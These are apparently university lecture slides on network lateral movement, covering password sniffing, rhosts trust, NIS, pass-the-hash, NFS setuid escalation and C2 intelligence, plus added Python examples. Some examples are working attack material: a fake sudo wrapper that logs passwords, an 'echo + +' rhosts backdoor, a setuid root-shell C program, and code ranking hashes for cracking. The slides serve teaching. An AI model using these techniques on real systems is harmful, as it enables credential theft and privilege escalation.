introduction to information security - tau · 2016-06-02 · introduction to information security...


Page 1: Introduction to Information Security - TAU · 2016-06-02 · Introduction to Information Security Network Travesal (Hacking Operations) & Miscellaneous related subjects 1. Network

Introduction to Information Security: Network Traversal (Hacking Operations) & Miscellaneous related subjects


Network Traversal - Introduction

• We now move from the act of hacking a single machine or device to the act of traversing an entire network:

• How organized networks are structured.

• How hackers penetrate organized networks, usually administered by a single person or a team of administrators.

• How hackers traverse the network to gain access to more resources and data.

• This is often referred to as lateral movement.


[Diagram: Victim Network, with movement labelled Vertical and Horizontal/Lateral]


First Target: Patient 0

• Hackers will try to infect one computer, by different methods:

• Chance / statistical luck (an opportunistic, untargeted infection).

• Spear-phishing or human error.

• Social engineering.

• Pure hacking (exploiting an exposed service).

• After infecting patient 0, hackers can launch different types of attacks, which now depend on the internal network structure.

• Using the information and access readily available on the hacked machine (cached credentials, trust relationships, mounted shares), hackers attempt to traverse the network laterally.


Spearphishing

• “Spear phishing is an e-mail spoofing fraud attempt that targets a specific organization, seeking unauthorized access to confidential data. Spear phishing attempts are not typically initiated by "random hackers" but are more likely to be conducted by perpetrators out for financial gain, trade secrets or military information.” --http://searchsecurity.techtarget.com/definition/spear-phishing


An email I received

• True story: I received this email last year. Can you spot the fail?


Network-wide Users

• In an organized network, each user is given a single user/password credential; this password authenticates the user against every machine in the network the user should have access to.

• Example: TAU. Your user and password are used to log in to the *n?x machines as well as to the video website.

• If a computer used by one of the users is compromised and his credentials are obtained, those credentials can be used to log in to every machine in the network that user has access to.


Sniffing for passwords

• By local example: on a shared host where we already control a user's account, replace sudo with a wrapper that records the password and then hands the command to the real sudo:

cat >> ~/.bashrc << '__EOF__'
alias sudo='/tmp/sudo.sh'
__EOF__

cat > /tmp/sudo.sh << '__EOF__'
#!/bin/bash
# Fake sudo: show the real prompt, log the password, then run the real sudo
# with the captured password on stdin so the victim sees nothing unusual.
printf '[sudo] password for %s: ' "$USER"
read -rs PASS; echo
echo "$PASS" >> /tmp/.password.log
echo "$PASS" | /usr/bin/sudo -S "$@"
__EOF__
chmod +x /tmp/sudo.sh

• The check a victim can run: the bash builtin type (type sudo) reports "sudo is aliased to ..." instead of /usr/bin/sudo. The same trick works with a shell function or with a writable directory placed early in PATH.


Sniffing for passwords

• On Windows and in other GUI-based applications, key logging is used to record credentials as they are typed.

• By actually sniffing the network, looking for telnet, FTP, HTTP basic authentication or other unencrypted protocols, where passwords cross the wire in clear text.

• By sniffing the network traffic for authentication hashes (e.g. NTLM challenge/response exchanges), which can later be cracked offline (more on the next slide).


Cracking passwords

• Gaining root access to /etc/shadow (historically the hashes lived in the world-readable /etc/passwd) yields the password hashes.

• John the Ripper or other brute-force and dictionary tools can then be used to recover the clear-text password. Modern hashes are salted and iterated, so wordlists and mangling rules, not exhaustive search, do most of the work.

• The clear-text password can be used to log in to other computers.

• Users tend to reuse the same password for all computers and services, making it easy to gain access to other resources.


rlogin/rsh - history

• Instead of logging in all the time, rlogin/rsh authenticate a user without a password, based on host trust (~/.rhosts and /etc/hosts.equiv).

• Once a connection arrives from a trusted machine and the client declares which user is connecting, that user automatically gains access to the remote machine with the same credentials. Nothing is proven except the source address (and a privileged source port) and the remote side's word.

• Many hacking techniques employ:

echo "+ +" > ~root/.rhosts

• This lets anybody from any host connect to the computer as root.

• IP spoofing can be used to gain remote access as well, and this poor authentication is still being used in some dark corners of the world.

• NFS v2/v3 (and any NFS version with sec=sys) uses the same bad model: the server identifies the client only by its host address, optionally requiring a privileged source port, and trusts the uid/gid the client asserts.
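As an added example (not part of the original slides), the following Python audit flags .rhosts / hosts.equiv entries that extend trust beyond a named host and user, including the "+ +" backdoor above. The entry grammar follows rhosts(5): one host per line, an optional user name, "+" as a wildcard, a leading "-" to deny, and "+@name" for a NIS netgroup. The sample file contents and host names are constructed.

```python
"""Audit .rhosts / hosts.equiv trust entries for wildcard trust (added example)."""
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample file; the last line is the "+ +" backdoor from the slide.
SAMPLE_RHOSTS = """\
# hosts allowed to rlogin/rsh in as this account
admin1.example.com alice
admin2.example.com
-badhost.example.com
+@adminhosts bob
+ +
"""


@dataclass
class Finding:
    line_no: int
    entry: str
    severity: str
    reason: str


def parse_entry(line: str) -> Optional[Tuple[str, Optional[str]]]:
    """Return (host, user) for one entry, or None for blank/comment lines.

    Grammar (rhosts(5)): '<host> [<user>]'. '+' matches anything, a leading '-'
    denies the host or user, and '+@group' / '-@group' name a NIS netgroup.
    """
    stripped = line.split("#", 1)[0].strip()
    if not stripped:
        return None
    parts = stripped.split()
    return parts[0], (parts[1] if len(parts) > 1 else None)


def audit_rhosts(text: str) -> List[Finding]:
    """Flag entries that extend trust beyond a named host/user pair."""
    findings: List[Finding] = []
    for no, raw in enumerate(text.splitlines(), 1):
        parsed = parse_entry(raw)
        if parsed is None:
            continue
        host, user = parsed
        entry = raw.strip()
        if host == "+" and user == "+":
            findings.append(Finding(no, entry, "critical",
                                    "any user on any host logs in without a password"))
        elif host == "+":
            findings.append(Finding(no, entry, "high",
                                    "any host is trusted for user %s" % (user or "<same name>")))
        elif user == "+":
            findings.append(Finding(no, entry, "high",
                                    "every user on %s is trusted" % host))
        elif host.startswith("+@") or (user or "").startswith("+@"):
            findings.append(Finding(no, entry, "medium",
                                    "trust delegated to a NIS netgroup; review its members"))
        # '-host' / '-user' entries deny access and need no finding.
    return findings


if __name__ == "__main__":
    for f in audit_rhosts(SAMPLE_RHOSTS):
        print("line %d [%s] %-20s %s" % (f.line_no, f.severity, f.entry, f.reason))
```

Run it against every ~/.rhosts and /etc/hosts.equiv on a host that still has an r-services daemon enabled; a "critical" finding on root's file is the backdoor from the slide.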


Domain of computers


Unix NIS (Network Information Service)

• NIS (formerly known as Yellow Pages/YP) is an old protocol used to distribute passwords (and other maps such as groups and hosts) across a network.

• The NIS passwd map is how the credentials of a network of computers are spread to every machine.

• Every NIS server in the domain serves maps that mirror files such as passwd, shadow, etc., and clients query them instead of their local files.

• From a shell: # ypcat passwd

• With a classic (non-shadow) NIS setup this returns the password hashes of ALL users in the domain, to any client that can reach the server, since NIS performs no client authentication.

• In a secure network scheme this does not include the root account; however, local account access can be gained on all computers sharing the passwd map.
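Added example (not from the slides), serving both the "Cracking passwords" slide and the NIS slide: a Python triage of what ypcat passwd, or a copied /etc/shadow, actually hands you. The sample lines are constructed (made-up users, made-up hash strings with only the right prefix or length); the second colon-separated field is classified by its crypt(3) prefix so you know which entries go to John the Ripper first and which are shadowed, empty or locked.

```python
"""Triage the hash field of passwd-style lines (ypcat passwd output or /etc/shadow)."""
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample: a NIS passwd map with hashes in field 2 (pre-shadow layout).
# The hash strings are fake; they only carry the prefix/length the parser keys on.
SAMPLE_YPCAT = """\
alice:$6$saltsalt$FakeSha512CryptHashFakeSha512CryptHash:1001:1001:Alice:/home/alice:/bin/bash
bob:$1$abcdefgh$FakeMd5CryptHashFakeMd:1002:1002:Bob:/home/bob:/bin/bash
carol:x:1003:1003:Carol:/home/carol:/bin/bash
dave::1004:1004:Dave:/home/dave:/bin/bash
erin:*:1005:1005:Erin:/home/erin:/sbin/nologin
frank:!$6$saltsalt$FakeSha512CryptHashFakeSha512CryptHash:1006:1006:Frank:/home/frank:/bin/bash
grace:AbCdEfGhIjKlM:1007:1007:Grace:/home/grace:/bin/sh
"""

PREFIXES = {"$1$": "md5crypt", "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
            "$5$": "sha256crypt", "$6$": "sha512crypt", "$7$": "scrypt", "$y$": "yescrypt"}
DES_RE = re.compile(r"^[./0-9A-Za-z]{13}$")   # traditional crypt(3): 2-char salt + 11 chars
# Rough brute-force cost, cheapest first; descrypt also truncates passwords to 8 characters.
COST_RANK = {"descrypt": 0, "md5crypt": 1, "sha256crypt": 2, "sha512crypt": 3,
             "scrypt": 4, "bcrypt": 5, "yescrypt": 6}


@dataclass
class Account:
    user: str
    status: str               # hash | locked | shadowed | empty
    algorithm: Optional[str]  # None when no hash is present
    hash: Optional[str]


def classify(user: str, field: str) -> Account:
    """Classify the second field of a passwd/shadow line."""
    if field == "":
        return Account(user, "empty", None, None)        # logs in with no password at all
    if field == "x":
        return Account(user, "shadowed", None, None)     # hash lives in shadow / the shadow map
    status = "hash"
    if field[0] in "!*":
        status = "locked"                                 # locked, but '!$6$...' still carries a hash
        field = field.lstrip("!*")
        if not field:
            return Account(user, status, None, None)
    for prefix, algo in PREFIXES.items():
        if field.startswith(prefix):
            return Account(user, status, algo, field)
    if DES_RE.match(field):
        return Account(user, status, "descrypt", field)
    return Account(user, status, "unknown", field)


def triage(text: str) -> List[Account]:
    out = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) >= 2:
            out.append(classify(fields[0], fields[1]))
    return out


def crack_order(accounts: List[Account]) -> List[Account]:
    """Entries worth feeding to John, cheapest algorithm first (stable for equal cost)."""
    return sorted((a for a in accounts if a.hash and a.algorithm in COST_RANK),
                  key=lambda a: COST_RANK[a.algorithm])


if __name__ == "__main__":
    accounts = triage(SAMPLE_YPCAT)
    for a in accounts:
        print("%-6s %-9s %s" % (a.user, a.status, a.algorithm or "-"))
    print("crack first:", [a.user for a in crack_order(accounts)])
```

Two details matter in practice: a "locked" entry whose field still contains a hash after the leading "!" is as crackable as any other (the lock only stops interactive login, and the password is probably reused elsewhere), and a 13-character DES entry is the cheapest target on the list by orders of magnitude.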


Pass the hash

• Pass-the-hash abuses the way Windows SSO (Single Sign On) works: in NTLM authentication the secret that is actually used is the NT hash of the password, not the password itself, so holding the hash is as good as holding the password.

• In Windows-based systems, by simply presenting the hash, a user is able to prove that he has the credentials needed to gain access to a resource (such as a network share).

• Once hackers log in to a system, they can take the hashes held locally and pass them to other systems by this process:

• Gain local administrator privileges.

• View locally logged-in accounts.

• Impersonate a user locally (replace the hash in a logon session).

• Use regular Windows operations to access network resources.

• Gain more access and run remote code using psexec (Sysinternals utility).


LSASS

• Slide was taken from "WCE Internals by Amplia Security".


Hash harvesting

• On Windows computers, hashes are kept in memory (in the LSASS process) for every logon session, and a cached verifier of the domain credential is also stored on disk so that a user can still log on when the domain is unreachable.

• Several tools in the wild do this hash harvesting, such as:

• WCE – Windows Credential Editor

• Pass The Hash Toolkit

• gsecdump

• Maybe more.

• pwdump - hash dumping is also possible locally by dumping the SAM file (Security Accounts Manager).

• WCE and its like:

• Use ReadProcessMemory() to read the memory of LSASS for harvesting.

• Inject code to implement the impersonation of users.

• Side note – cracking LM hashes (the weak DES-based scheme is the LM hash, not the NT hash that NTLM uses): an LM hash covers at most 14 characters, uppercases the password and DES-encrypts each 7-byte half separately, so the attacker searches 2 * 95^7 (in practice 2 * 69^7, since case is lost) instead of 95^14, and a rainbow table covers the whole space easily. The NT hash (MD4 of the UTF-16LE password) has no length limit, but it is unsalted, so rainbow tables work against it too.
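Added example, serving both the pass-the-hash slide and this hash-harvesting slide (it is not code from the slides or from any of the tools named above): a Python model of why a dumped NT hash is a password equivalent. The NT hash is MD4 over the UTF-16LE password, and the NTLMv2 challenge/response (MS-NLMP section 3.3.2) is an HMAC-MD5 keyed from that hash, so a client holding only the hash produces exactly the proof a client holding the password would, and the DC, which stores the same hash, cannot tell them apart. MD4 is implemented inline because hashlib's md4 is absent on many OpenSSL 3 builds; the user, domain, server challenge and the simplified NTLMv2 blob are constructed values, and the LM hash is not shown because DES is not in the standard library.

```python
"""Pass-the-hash in numbers: the NT hash alone answers an NTLMv2 challenge (added example)."""
import hashlib
import hmac
import struct

M32 = 0xFFFFFFFF


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & M32


def md4(msg: bytes) -> bytes:
    """RFC 1320 MD4 (little-endian words, 64-bit little-endian length)."""
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    bit_len = len(msg) * 8
    msg = msg + b"\x80" + b"\x00" * ((55 - len(msg)) % 64) + struct.pack("<Q", bit_len)
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    r2 = (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)
    r3 = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):   # round 1
            a = _rotl((a + f(b, c, d) + x[i]) & M32, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):   # round 2
            a = _rotl((a + g(b, c, d) + x[r2[i]] + 0x5A827999) & M32, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):   # round 3
            a = _rotl((a + h(b, c, d) + x[r3[i]] + 0x6ED9EBA1) & M32, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & M32, (b + bb) & M32, (c + cc) & M32, (d + dd) & M32
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    """NTOWFv1: MD4 over the UTF-16LE password. No salt, no length limit."""
    return md4(password.encode("utf-16-le"))


def ntlmv2_response(nt: bytes, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTLMv2 NtChallengeResponse: HMAC-MD5(NTOWFv2, ServerChallenge || blob) || blob.

    NTOWFv2 = HMAC-MD5(NT hash, UTF-16LE(upper(user) + domain)). Only the NT hash
    enters the computation, which is exactly what makes pass-the-hash work.
    """
    ntowf_v2 = hmac.new(nt, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()
    proof = hmac.new(ntowf_v2, server_challenge + blob, hashlib.md5).digest()
    return proof + blob


def server_accepts(stored_nt: bytes, user: str, domain: str, server_challenge: bytes, response: bytes) -> bool:
    """The DC stores the same NT hash and recomputes the proof; it cannot tell hash from password."""
    proof, blob = response[:16], response[16:]
    expected = ntlmv2_response(stored_nt, user, domain, server_challenge, blob)[:16]
    return hmac.compare_digest(proof, expected)


if __name__ == "__main__":
    # Constructed scenario: the attacker dumped this NT hash from LSASS and never learns the password.
    dumped = bytes.fromhex("8846f7eaee8fb117ad06bdd830b7586c")
    challenge = bytes.fromhex("0123456789abcdef")                                   # 8-byte ServerChallenge
    blob = b"\x01\x01" + b"\x00" * 6 + b"\x00" * 8 + b"client-nonce" + b"\x00" * 4  # simplified NTLMv2 blob
    response = ntlmv2_response(dumped, "alice", "CORP", challenge, blob)
    print("DC accepts the hash-only client:", server_accepts(dumped, "alice", "CORP", challenge, response))
```

The defensive consequence follows from the code: once the hash is in an attacker's hands, rotating nothing but the password on the same account is the only thing that invalidates it, and keeping privileged hashes out of LSASS on workstations (no interactive admin logons, Credential Guard, Protected Users) is what keeps them from being harvested in the first place.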


Unix NFS (Network File System)

• Unix NFS is comparable to Windows "Sharing": a method of sharing directories by allowing others to mount a remote directory locally as if it were their own.

• As we previously learned, a root-owned file with u+s (setuid) and o+x hands us root privileges, so we can escalate:

cat > a.c << '__EOF__'
#include <stdlib.h>
#include <unistd.h>
int main(void) { setuid(0); setgid(0); system("/bin/sh"); return 0; }
__EOF__
gcc -o a a.c
# as root on a client where the export is mounted without root_squash:
chown root a && chmod u+s,o+x a

• Misconfigured NFS (an export with no_root_squash, or a client mount without nosuid) allows a mounted directory to contain suid files, therefore allowing root on one machine the ability to gain

• http://packetstorm.wowhacker.com/mag/faith/faith8.txt


Shared binaries patching

• Administrators or users share binaries on network shares / NFS (usually installation files).

• If those network shares are writable by a hacker, he can modify the binaries and then wait for other users (or for root, via cron or at boot) to execute them.

• Example at TAU: the root filesystem itself is a writable NFSv3 mount using sec=sys, i.e. host and uid trust only:

user@nova:~$ mount | grep '/ type'
netapp1:/vol/vol0/linux-root/precise/common/ on / type nfs (rw,relatime,vers=3,rsize=65536,wsize=65536,namlen=255,hard,nolock,proto=tcp,port=65535,timeo=70,retrans=3,sec=sys,local_lock=all,addr=132.67.192.53)
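Added example (not from the slides), covering both the NFS suid slide and the shared-binaries slide: a Python audit of the two places the preconditions live. On the client, mount output is checked for NFS mounts that honour suid bits (no nosuid) and that are writable with only AUTH_SYS trust (sec=sys, the default when no sec= option is shown); on the server, /etc/exports is checked for world-writable exports and for no_root_squash, which lets root on a client create root-owned suid files. The first mount line is the one from the TAU slide; the second mount line and the exports file are constructed.

```python
"""Audit NFS mounts and exports for the preconditions of the suid and binary-patching attacks."""
import re
from dataclasses import dataclass
from typing import List

# First line is the mount from the TAU slide (a root filesystem served over NFSv3);
# the second line and the exports file below are constructed.
SAMPLE_MOUNTS = """\
netapp1:/vol/vol0/linux-root/precise/common/ on / type nfs (rw,relatime,vers=3,rsize=65536,wsize=65536,namlen=255,hard,nolock,proto=tcp,port=65535,timeo=70,retrans=3,sec=sys,local_lock=all,addr=132.67.192.53)
fileserver:/export/home on /home type nfs4 (rw,relatime,vers=4.2,nosuid,nodev,sec=krb5p,addr=10.0.0.5)
"""

SAMPLE_EXPORTS = """\
# /etc/exports on the server (constructed)
/export/home     10.0.0.0/24(rw,sync,root_squash)
/export/software *(rw,no_root_squash)
/export/iso      *(ro)
"""

MOUNT_RE = re.compile(r"^(?P<src>\S+) on (?P<mnt>\S+) type (?P<fstype>\S+) \((?P<opts>[^)]*)\)")


@dataclass
class Issue:
    where: str
    problem: str


def audit_mounts(mount_output: str) -> List[Issue]:
    """Client side: which NFS mounts let a remote party hand us a suid binary or a patched one?"""
    issues = []
    for line in mount_output.splitlines():
        m = MOUNT_RE.match(line)
        if not m or not m["fstype"].startswith("nfs"):
            continue
        opts = m["opts"].split(",")
        mnt = m["mnt"]
        sec = next((o[4:] for o in opts if o.startswith("sec=")), "sys")  # AUTH_SYS is the default
        if "nosuid" not in opts:
            issues.append(Issue(mnt, "suid bits honoured on an NFS mount (mount with nosuid)"))
        if "rw" in opts and sec == "sys":
            issues.append(Issue(mnt, "writable mount with sec=sys: the server trusts the uid each "
                                     "client asserts, so anyone controlling a client can patch files here"))
    return issues


def audit_exports(exports: str) -> List[Issue]:
    """Server side: which exports let a client plant root-owned suid files or replace binaries?"""
    issues = []
    for raw in exports.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        path, clients = (line.split(None, 1) + [""])[:2]
        for entry in clients.split():
            host, _, optstr = entry.partition("(")
            opts = set(optstr.rstrip(")").split(",")) if optstr else set()
            if host == "*" and "rw" in opts:
                issues.append(Issue(path, "world-writable export: any host may replace shared binaries"))
            if "no_root_squash" in opts:
                issues.append(Issue(path, "no_root_squash for %s: root on that client can create "
                                          "root-owned suid files on the server" % host))
    return issues


if __name__ == "__main__":
    for issue in audit_mounts(SAMPLE_MOUNTS) + audit_exports(SAMPLE_EXPORTS):
        print("%-18s %s" % (issue.where, issue.problem))
```

Against the slide's own mount line the audit reports two issues for "/": no nosuid, and rw with sec=sys. The Kerberos-protected, nosuid home mount in the constructed second line passes, which is the configuration that closes both attacks on the client side.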


Some miscellaneous related topics

• 0-day gap

• C2 Intelligence

• Passive DNS

• Deception Tactics


0-day gap

• The time between the discovery of a vulnerability and the release of a patch (the vendor's time-to-market for the fix) is the 0-day response time.

• Companies publish contact info for researchers to disclose vulnerabilities and exploits.

• Once an exploit is disclosed there is a race between hackers and developers: exploit vs. close.

• Companies hire vulnerability researchers to look for bugs that could compromise their security.


0-Day Example


C2 (C&C) Intelligence

• The classic anti-virus model was signature based:

• Signatures inside binaries.

• Signatures in Windows registry keys & values.

• Signatures in network traffic.

• Network anti-viruses use the same engines, applied to traffic on the network.

• Old attitude: only detect what you can _remove_.

• New attitude: detection and blocking alone is better than nothing.

• Signatures were rephrased as intelligence, with the emphasis on detection; another common name is Indicator of Compromise (IOC).

• Some intelligence vendors take active measures to discover intelligence.


Caveats of Intelligence

• Without "hacking" the hackers, there is no way to create an IOC before someone has been attacked.

• If hackers create different C2 servers for each attack, you will never have the intelligence in time.


Passive DNS

• Security researchers have been collecting hostname/IP pairs for a few years now.

• This is done using data collectors (sensors) installed at many ISPs' DNS resolvers, which record each answer together with when it was first and last seen.


Passive DNS (Cont.)

• The hostname/IP pairs can be used to back-track hackers' resources.

• Suppose hacker An0n2016 uses cnn-news.com (it is blacklisted).

• Using the database we can see the IPs cnn-news.com resolved to, and the other domains that resolved to the same IPs:

• Now, without much more information, you would make the educated guess that adobe-updatre.org is being used by the same hacker, and therefore blacklist it too.

• VirusTotal.com has a publicly queryable passive DNS database, but it is an incomplete one.
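Added example (not from the slides): the pivot described above as a small Python breadth-first search over passive DNS records. The records are constructed; cnn-news.com and adobe-updatre.org are the names from the slide, the IPs are documentation ranges and every other name is made up. Two guards are added that the slide's "educated guess" needs in practice: an IP that carries many unrelated names (shared hosting, a CDN, a parking service) is not expanded, and a co-hosted name only counts if its time on the IP overlapped the time the pivot name spent there, so an address reused years later does not drag an innocent site onto the block list.

```python
"""Passive DNS pivot from one blacklisted domain to co-hosted attacker infrastructure (added example)."""
from collections import defaultdict
from datetime import date
from typing import Dict, List, Set, Tuple

Interval = Tuple[date, date]

# Constructed records: (rrname, rrtype, rdata, first_seen, last_seen).
RECORDS = [
    ("cnn-news.com", "A", "203.0.113.10", date(2016, 3, 1), date(2016, 4, 2)),
    ("cnn-news.com", "A", "203.0.113.11", date(2016, 4, 3), date(2016, 5, 1)),
    ("adobe-updatre.org", "A", "203.0.113.11", date(2016, 4, 20), date(2016, 5, 20)),
    ("login-secure-mail.net", "A", "203.0.113.10", date(2016, 3, 5), date(2016, 3, 30)),
    ("old-shop.example", "A", "203.0.113.10", date(2014, 1, 1), date(2014, 6, 1)),  # same IP, two years earlier
    ("cnn-news.com", "A", "198.51.100.7", date(2016, 5, 2), date(2016, 5, 3)),      # parked on shared hosting
    ("innocent-blog.example", "A", "198.51.100.7", date(2015, 1, 1), date(2016, 6, 1)),
] + [("site%d.example" % i, "A", "198.51.100.7", date(2015, 1, 1), date(2016, 6, 1)) for i in range(40)]


def build_index(records):
    """name -> {ip: (first, last)} and ip -> {name: (first, last)}, merging repeated pairs."""
    by_name: Dict[str, Dict[str, Interval]] = defaultdict(dict)
    by_ip: Dict[str, Dict[str, Interval]] = defaultdict(dict)
    for name, rtype, rdata, first, last in records:
        if rtype != "A":
            continue
        for index, key, other in ((by_name, name, rdata), (by_ip, rdata, name)):
            f, l = index[key].get(other, (first, last))
            index[key][other] = (min(f, first), max(l, last))
    return by_name, by_ip


def overlaps(a: Interval, b: Interval) -> bool:
    return a[0] <= b[1] and b[0] <= a[1]


def pivot(seed: str, records, max_shared: int = 10, depth: int = 2):
    """Breadth-first: seed -> its IPs -> other names on those IPs, repeated `depth` times.

    An IP carrying more than `max_shared` names is treated as shared hosting and not
    expanded; a co-hosted name only counts if its interval on the IP overlaps the
    pivot name's interval there. Returns ({name: hop}, {ips skipped as shared}).
    """
    by_name, by_ip = build_index(records)
    found: Dict[str, int] = {seed: 0}
    skipped: Set[str] = set()
    frontier: List[str] = [seed]
    for hop in range(1, depth + 1):
        nxt: List[str] = []
        for name in frontier:
            for ip, when in by_name.get(name, {}).items():
                if len(by_ip[ip]) > max_shared:
                    skipped.add(ip)
                    continue
                for other, other_when in by_ip[ip].items():
                    if other not in found and overlaps(when, other_when):
                        found[other] = hop
                        nxt.append(other)
        frontier = nxt
    return found, skipped


if __name__ == "__main__":
    related, shared = pivot("cnn-news.com", RECORDS)
    print("candidate block list:", sorted(n for n, hop in related.items() if hop > 0))
    print("shared IPs not expanded:", sorted(shared))
```

On the constructed data the pivot returns adobe-updatre.org and login-secure-mail.net at one hop, leaves old-shop.example out because its 2014 stay on 203.0.113.10 never overlapped the attacker's, and refuses to expand 198.51.100.7 because forty-odd names sit on it. Raising max_shared shows the failure mode: innocent-blog.example immediately joins the list.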


Other Techniques for Realtime C2 Intelligence

• Newly created domains: a domain that is seen for the first time.

• Whois/Whowas & NLP: the internet domain registry contains data on the owner.

• Look for: private registration.

• Domain popularity.

• Geolocation: maybe your network shouldn't be connecting to China.


Deception Solutions

• A new breed of product aimed at exposing attackers by deceiving them into working on decoys.

Credit: https://www.cymmetria.com/


Questions?


Good Luck in the Test!

• The test is hard.

• You will need to prepare a folder with this semester's material and bookmarks for the subjects!

• Hopefully, there will be a 3-hour rehearsal exercise before the test.

• Feel free to drop by with questions and ask for help.